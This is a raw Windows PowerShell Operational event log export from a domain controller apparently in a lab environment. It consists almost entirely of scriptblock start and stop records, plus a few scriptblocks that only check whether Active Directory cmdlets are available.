LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478735
Keywords=None
Message=Completed invocation of ScriptBlock ID: 452fa818-f7e7-4534-b881-7159e414064e
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478734
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ba43aee-8949-46d3-badb-6615fde995c8
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478733
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ba43aee-8949-46d3-badb-6615fde995c8
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478732
Keywords=None
Message=Started invocation of ScriptBlock ID: 452fa818-f7e7-4534-b881-7159e414064e
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478731
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }}

ScriptBlock ID: 452fa818-f7e7-4534-b881-7159e414064e
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478730
Keywords=None
Message=Started invocation of ScriptBlock ID: b6cc795c-e37b-4d73-8dc4-a4bc01fa13ee
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478729
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }}

ScriptBlock ID: b6cc795c-e37b-4d73-8dc4-a4bc01fa13ee
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478728
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478727
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 728 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478726
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478899
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478898
Keywords=None
Message=Completed invocation of ScriptBlock ID: 267f98f6-4cca-4a2b-ae91-576c5f578229
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478897
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478896
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478895
Keywords=None
Message=Started invocation of ScriptBlock ID: 267f98f6-4cca-4a2b-ae91-576c5f578229
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478894
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 267f98f6-4cca-4a2b-ae91-576c5f578229
Path:
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478893
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478892
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478891
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6486e79f-85c1-448f-a72c-cd908b7c857d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478890
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478889
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478888
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478887
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478886
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478885
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478884
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478883
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478882
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478881
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478880
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478879
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478878
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478877
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478876
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478875
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478874
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478873
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478872
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478871
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478870
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478869
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478868
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478867
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478866
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478865
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478864
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478863
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478862
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478861
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478860
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478859
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479126
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2ef9d7b6-1bb1-47a1-8529-cd609018d01c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479125
Keywords=None
Message=Started invocation of ScriptBlock ID: 2ef9d7b6-1bb1-47a1-8529-cd609018d01c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479124
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b7d7beb-79e7-457b-bdf6-bd843e1e9332
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479123
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b7d7beb-79e7-457b-bdf6-bd843e1e9332
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
